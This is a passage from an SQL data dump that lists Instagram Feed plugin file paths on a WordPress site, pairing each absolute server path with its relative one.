/ext-featuredpost.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/ext-featuredpost.png'),(781,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/ext-reviews.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/ext-reviews.png'),(782,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/ext-singlealbum.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/ext-singlealbum.png'),(783,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/ext-socialwall.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/ext-socialwall.png'),(784,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/featuredpost.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/featuredpost.png'),(785,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/footer-social.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/footer-social.png'),(786,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/instagram.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/instagram.png'),(787,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/landscapeswelove.jpg','wp-content/plugins/instagram-feed/admin/builder/assets/img/landscapeswelove.jpg'),(788,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/logo.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/logo.png'),(789,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/monsterinsight.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/monsterinsight.png'),(790,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/more-feeds.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/more-feeds.png'),(791,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/onboarding-banner.jpg','wp-content/plugins/instagram-feed/admin/builder/assets/img/onboarding-banner.jpg'),(792,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/optinmonster.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/optinmonster.png'),(793,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/photos.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/photos.png'),(794,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/process-error-fetch.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/process-error-fetch.png'),(795,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/process-featured-post.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/process-featured-post.png'),(796,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/process-single-album.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/process-single-album.png'),(797,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/pushengage.svg','wp-content/plugins/instagram-feed/admin/builder/assets/img/pushengage.svg'),(798,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/reviews.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/reviews.png'),(799,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/seedprod.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/seedprod.png'),(800,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/singlealbum.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/singlealbum.png'),(801,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/socialwall.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/socialwall.png'),(802,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/success-banner.jpg','wp-content/plugins/instagram-feed/admin/builder/assets/img/success-banner.jpg'),(803,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/timeline.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/timeline.png'),(804,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/user.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/user.png'),(805,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/videos.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/videos.png'),(806,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/waving-hand.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/waving-hand.png'),(807,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/welcome-1.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/welcome-1.png'),(808,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/welcome-2.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/welcome-2.png'),(809,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/img/wpforms.png','wp-content/plugins/instagram-feed/admin/builder/assets/img/wpforms.png'),(810,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/add-source.js','wp-content/plugins/instagram-feed/admin/builder/assets/js/add-source.js'),(811,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/builder.js','wp-content/plugins/instagram-feed/admin/builder/assets/js/builder.js'),(812,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/confirm-dialog.js','wp-content/plugins/instagram-feed/admin/builder/assets/js/confirm-dialog.js'),(813,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/date_i18n.js','wp-content/plugins/instagram-feed/admin/builder/assets/js/date_i18n.js'),(814,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/install-plugin-popup.js','wp-content/plugins/instagram-feed/admin/builder/assets/js/install-plugin-popup.js'),(815,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/jquery.tooltipster.min.js','wp-content/plugins/instagram-feed/admin/builder/assets/js/jquery.tooltipster.min.js'),(816,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/oembed.js','wp-content/plugins/instagram-feed/admin/builder/assets/js/oembed.js'),(817,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/owl.autoheight.js','wp-content/plugins/instagram-feed/admin/builder/assets/js/owl.autoheight.js'),(818,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/personal-account.js','wp-content/plugins/instagram-feed/admin/builder/assets/js/personal-account.js'),(819,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/ressources.js','wp-content/plugins/instagram-feed/admin/builder/assets/js/ressources.js'),(820,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/tooltip-wizard.js','wp-content/plugins/instagram-feed/admin/builder/assets/js/tooltip-wizard.js'),(821,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/assets/js/vue-color.min.js','wp-content/plugins/instagram-feed/admin/builder/assets/js/vue-color.min.js'),(822,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/builder.php','wp-content/plugins/instagram-feed/admin/builder/templates/builder.php'),(823,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/add-source.php','wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/add-source.php'),(824,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/configure-features.php','wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/configure-features.php'),(825,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/install-plugins.php','wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/install-plugins.php'),(826,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/success-page.php','wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/success-page.php'),(827,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/welcome.php','wp-content/plugins/instagram-feed/admin/builder/templates/onboarding/welcome.php'),(828,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/preview/error.php','wp-content/plugins/instagram-feed/admin/builder/templates/preview/error.php'),(829,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/preview/header.php','wp-content/plugins/instagram-feed/admin/builder/templates/preview/header.php'),(830,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/preview/light-box.php','wp-content/plugins/instagram-feed/admin/builder/templates/preview/light-box.php'),(831,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/preview/theme-styles.php','wp-content/plugins/instagram-feed/admin/builder/templates/preview/theme-styles.php'),(832,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/screens/customizer.php','wp-content/plugins/instagram-feed/admin/builder/templates/screens/customizer.php'),(833,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/screens/onboarding-wizard.php','wp-content/plugins/instagram-feed/admin/builder/templates/screens/onboarding-wizard.php'),(834,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/screens/select-feed.php','wp-content/plugins/instagram-feed/admin/builder/templates/screens/select-feed.php'),(835,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/screens/welcome.php','wp-content/plugins/instagram-feed/admin/builder/templates/screens/welcome.php'),(836,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/create-feed/multiple-sources-list.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/create-feed/multiple-sources-list.php'),(837,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/create-feed/multiple-sources.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/create-feed/multiple-sources.php'),(838,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/create-feed/single-public-hashtags.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/create-feed/single-public-hashtags.php'),(839,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/create-feed/single-sources.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/create-feed/single-sources.php'),(840,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/customizer/preview.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/customizer/preview.php'),(841,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/customizer/sidebar.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/customizer/sidebar.php'),(842,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/empty-state.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/empty-state.php'),(843,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds/feeds.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds/feeds.php'),(844,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds/instances.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds/instances.php'),(845,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds/legacy-feeds.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds/legacy-feeds.php'),(846,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds-list.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds-list.php'),(847,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds-type.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/feeds-type.php'),(848,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/footer.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/footer.php'),(849,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/header.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/header.php'),(850,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/add-source-popup.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/add-source-popup.php'),(851,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/confirm-dialog-popup.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/confirm-dialog-popup.php'),(852,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/embed-popup.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/embed-popup.php'),(853,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/extensions-popup.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/extensions-popup.php'),(854,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/feedtypes-customizer-popup.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/feedtypes-customizer-popup.php'),(855,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/feedtypes-popup.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/feedtypes-popup.php'),(856,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/install-plugin-popup.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/install-plugin-popup.php'),(857,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/onboarding-customizer-popup.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/onboarding-customizer-popup.php'),(858,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/onboarding-popup.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/onboarding-popup.php'),(859,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/personal-account-popup.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/personal-account-popup.php'),(860,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/source-instances.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/source-instances.php'),(861,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/sources-list-popup.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/sources-list-popup.php'),(862,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/temp-login-about.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/temp-login-about.php'),(863,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/uncanny-automator-integraion.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/popup/uncanny-automator-integraion.php'),(864,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/sections/select-source.php','wp-content/plugins/instagram-feed/admin/builder/templates/sections/select-source.php'),(865,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/builder/templates/wizard.php','wp-content/plugins/instagram-feed/admin/builder/templates/wizard.php'),(866,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/about/content.php','wp-content/plugins/instagram-feed/admin/views/about/content.php'),(867,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/about/index.php','wp-content/plugins/instagram-feed/admin/views/about/index.php'),(868,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/oembeds/content.php','wp-content/plugins/instagram-feed/admin/views/oembeds/content.php'),(869,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/oembeds/index.php','wp-content/plugins/instagram-feed/admin/views/oembeds/index.php'),(870,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/oembeds/modal.php','wp-content/plugins/instagram-feed/admin/views/oembeds/modal.php'),(871,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/oembeds/oembed_features.php','wp-content/plugins/instagram-feed/admin/views/oembeds/oembed_features.php'),(872,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/oembeds/plugin_info.php','wp-content/plugins/instagram-feed/admin/views/oembeds/plugin_info.php'),(873,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/sections/builder_footer_cta.php','wp-content/plugins/instagram-feed/admin/views/sections/builder_footer_cta.php'),(874,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/sections/header.php','wp-content/plugins/instagram-feed/admin/views/sections/header.php'),(875,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/sections/settings_footer_cta.php','wp-content/plugins/instagram-feed/admin/views/sections/settings_footer_cta.php'),(876,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/sections/sticky_widget.php','wp-content/plugins/instagram-feed/admin/views/sections/sticky_widget.php'),(877,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/settings/content.php','wp-content/plugins/instagram-feed/admin/views/settings/content.php'),(878,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/settings/index.php','wp-content/plugins/instagram-feed/admin/views/settings/index.php'),(879,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/settings/tab/advanced.php','wp-content/plugins/instagram-feed/admin/views/settings/tab/advanced.php'),(880,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/settings/tab/feeds.php','wp-content/plugins/instagram-feed/admin/views/settings/tab/feeds.php'),(881,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/settings/tab/general.php','wp-content/plugins/instagram-feed/admin/views/settings/tab/general.php'),(882,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/support/content.php','wp-content/plugins/instagram-feed/admin/views/support/content.php'),(883,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/support/index.php','wp-content/plugins/instagram-feed/admin/views/support/index.php'),(884,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/admin/views/support/support-tools.php','wp-content/plugins/instagram-feed/admin/views/support/support-tools.php'),(885,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/composer.json','wp-content/plugins/instagram-feed/composer.json'),(886,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/css/admin-notifications.css','wp-content/plugins/instagram-feed/css/admin-notifications.css'),(887,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/css/sb-blocks.css','wp-content/plugins/instagram-feed/css/sb-blocks.css'),(888,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/css/sb-instagram-2-2.css','wp-content/plugins/instagram-feed/css/sb-instagram-2-2.css'),(889,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/css/sb-instagram-2-2.min.css','wp-content/plugins/instagram-feed/css/sb-instagram-2-2.min.css'),(890,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/css/sb-instagram-admin.css','wp-content/plugins/instagram-feed/css/sb-instagram-admin.css'),(891,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/css/sbi-styles.css','wp-content/plugins/instagram-feed/css/sbi-styles.css'),(892,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/css/sbi-styles.min.css','wp-content/plugins/instagram-feed/css/sbi-styles.min.css'),(893,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/gpl-2.0.txt','wp-content/plugins/instagram-feed/gpl-2.0.txt'),(894,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/img/balloon-120.png','wp-content/plugins/instagram-feed/img/balloon-120.png'),(895,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/img/insta-logo.png','wp-content/plugins/instagram-feed/img/insta-logo.png'),(896,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/img/loader.png','wp-content/plugins/instagram-feed/img/loader.png'),(897,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/img/placeholder.png','wp-content/plugins/instagram-feed/img/placeholder.png'),(898,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/img/sbi-icon.png','wp-content/plugins/instagram-feed/img/sbi-icon.png'),(899,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/img/sbi-sprite.png','wp-content/plugins/instagram-feed/img/sbi-sprite.png'),(900,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/img/thumb-placeholder.png','wp-content/plugins/instagram-feed/img/thumb-placeholder.png'),(901,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Actionbutton_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Actionbutton_Control.php'),(902,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Checkbox_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Checkbox_Control.php'),(903,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Checkboxlist_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Checkboxlist_Control.php'),(904,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Checkboxsection_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Checkboxsection_Control.php'),(905,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Coloroverride_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Coloroverride_Control.php'),(906,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Colorpicker_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Colorpicker_Control.php'),(907,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Controls_Base.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Controls_Base.php'),(908,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Customview_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Customview_Control.php'),(909,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Datepicker_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Datepicker_Control.php'),(910,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Heading_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Heading_Control.php'),(911,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Hidden_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Hidden_Control.php'),(912,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Imagechooser_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Imagechooser_Control.php'),(913,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Number_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Number_Control.php'),(914,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Select_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Select_Control.php'),(915,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Separator_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Separator_Control.php'),(916,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Switcher_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Switcher_Control.php'),(917,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Text_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Text_Control.php'),(918,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Textarea_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Textarea_Control.php'),(919,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Toggle_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Toggle_Control.php'),(920,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Togglebutton_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Togglebutton_Control.php'),(921,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Toggleset_Control.php','wp-content/plugins/instagram-feed/inc/Builder/Controls/SB_Toggleset_Control.php'),(922,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/SBI_Db.php','wp-content/plugins/instagram-feed/inc/Builder/SBI_Db.php'),(923,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/SBI_Feed_Builder.php','wp-content/plugins/instagram-feed/inc/Builder/SBI_Feed_Builder.php'),(924,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/SBI_Feed_Saver.php','wp-content/plugins/instagram-feed/inc/Builder/SBI_Feed_Saver.php'),(925,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/SBI_Feed_Saver_Manager.php','wp-content/plugins/instagram-feed/inc/Builder/SBI_Feed_Saver_Manager.php'),(926,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/SBI_Post_Set.php','wp-content/plugins/instagram-feed/inc/Builder/SBI_Post_Set.php'),(927,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/SBI_Source.php','wp-content/plugins/instagram-feed/inc/Builder/SBI_Source.php'),(928,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/SBI_Theme_CSS.php','wp-content/plugins/instagram-feed/inc/Builder/SBI_Theme_CSS.php'),(929,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/SBI_Tooltip_Wizard.php','wp-content/plugins/instagram-feed/inc/Builder/SBI_Tooltip_Wizard.php'),(930,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/SB_Builder_Customizer.php','wp-content/plugins/instagram-feed/inc/Builder/SB_Builder_Customizer.php'),(931,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Tabs/SBI_Builder_Customizer_Tab.php','wp-content/plugins/instagram-feed/inc/Builder/Tabs/SBI_Builder_Customizer_Tab.php'),(932,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Tabs/SBI_Customize_Tab.php','wp-content/plugins/instagram-feed/inc/Builder/Tabs/SBI_Customize_Tab.php'),(933,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Builder/Tabs/SBI_Settings_Tab.php','wp-content/plugins/instagram-feed/inc/Builder/Tabs/SBI_Settings_Tab.php'),(934,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Email_Notification.php','wp-content/plugins/instagram-feed/inc/Email_Notification.php'),(935,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Helpers/SB_Instagram_Tracking.php','wp-content/plugins/instagram-feed/inc/Helpers/SB_Instagram_Tracking.php'),(936,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Helpers/Util.php','wp-content/plugins/instagram-feed/inc/Helpers/Util.php'),(937,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Platform_Data.php','wp-content/plugins/instagram-feed/inc/Platform_Data.php'),(938,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/instagram-feed/inc/Services/ServiceContainer.php','wp-content/p